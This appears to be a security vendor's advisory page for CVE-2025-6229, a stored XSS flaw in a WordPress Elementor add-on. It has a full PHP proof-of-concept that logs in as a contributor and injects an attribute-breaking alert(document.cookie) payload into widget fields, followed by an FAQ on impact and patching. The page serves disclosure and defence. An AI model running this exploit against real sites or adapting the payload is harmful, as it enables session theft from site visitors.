// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-6229 - Sina Extension for Elementor <= 3.7.0 - Authenticated Stored XSS

<?php
/**
 * Proof of Concept for CVE-2025-6229
 * Requires Contributor+ credentials and Elementor/Sina Extension installed
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Malicious payload to inject into widget attributes
$payload = '" onmouseover="alert(document.cookie)" data-x="';

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Verify login success by checking for admin bar
if (strpos($response, 'wp-admin-bar') === false) {
    die('Login failed. Check credentials.');
}

// Get nonce for Elementor AJAX requests
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php?post_type=page');
$response = curl_exec($ch);

// Extract Elementor nonce (simplified - real implementation needs proper parsing)
preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die('Could not extract Elementor nonce');
}

// Create a new page with Elementor
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'save_builder' => [
            'data' => [
                'post_id' => 'new',
                'status' => 'draft',
                'elements' => [
                    [
                        'id' => 'test_widget',
                        'elType' => 'widget',
                        'widgetType' => 'sina-fancy-text',
                        'settings' => [
                            'fancy_text' => 'Normal Text ' . $payload,
                            'suffix' => $payload,
                            'prefix' => $payload
                        ]
                    ]
                ]
            ],
            'nonce' => $nonce
        ]
    ])
]));

$response = curl_exec($ch);
curl_close($ch);

// Check if payload was injected
if (strpos($response, 'success') !== false) {
    echo 'Payload injected successfully. Visit the created page to trigger XSS.';
} else {
    echo 'Injection failed. Response: ' . $response;
}

?>

Frequently Asked Questions

What is CVE-2025-6229?
Overview of the vulnerability
CVE-2025-6229 is a stored cross-site scripting (XSS) vulnerability in the Sina Extension for Elementor plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages via the Fancy Text Widget and Countdown Widget due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when user input is directly rendered into DOM attributes without proper escaping. Authenticated attackers can create or edit posts using Elementor, inject malicious scripts into widget parameters, and when other users view the affected pages, the scripts execute in their browsers.
Who is affected by this vulnerability?
Identifying affected users and installations
Any WordPress site using the Sina Extension for Elementor plugin version 3.7.0 or earlier is affected. This includes sites where users have Contributor-level access or higher, allowing them to potentially exploit the vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Sina Extension for Elementor plugin installed. If it is version 3.7.0 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Contributor-level access or higher.
How can I fix the vulnerability?
Steps to mitigate the issue
To fix CVE-2025-6229, update the Sina Extension for Elementor plugin to version 3.7.1 or later, where the vulnerability is patched. Regularly check for updates to all plugins and themes to maintain security.
What does the risk level of 'Medium' mean?
Understanding the severity rating
A ‘Medium’ risk level indicates that the vulnerability poses a moderate risk to affected systems. While exploitation requires authenticated access, the potential for significant impact, such as session hijacking or content manipulation, makes it important to address promptly.
What is the CVSS score of this vulnerability?
Understanding the scoring system
CVE-2025-6229 has a CVSS score of 6.4, which reflects its medium severity. This score is derived from factors like exploitability, impact on confidentiality, integrity, and availability, and provides a standardized way to assess the risk.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) is a type of vulnerability where an attacker can inject malicious scripts into content that is stored on the server. When users access the affected content, the scripts execute in their browsers, potentially leading to data theft or unauthorized actions.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by injecting a malicious payload into widget attributes. It outlines the steps to authenticate and execute the attack, illustrating the ease of exploitation for users with the necessary permissions.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updates are not possible, consider disabling the Sina Extension for Elementor plugin until it can be updated. Additionally, review user roles and restrict access to prevent potential exploitation by Contributor-level users.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating vulnerable plugins, ensure that all user accounts have appropriate permissions, implement strong password policies, and consider using security plugins that monitor for vulnerabilities and unauthorized changes.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-6229 can be found on the official CVE database, security advisories from the plugin developers, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations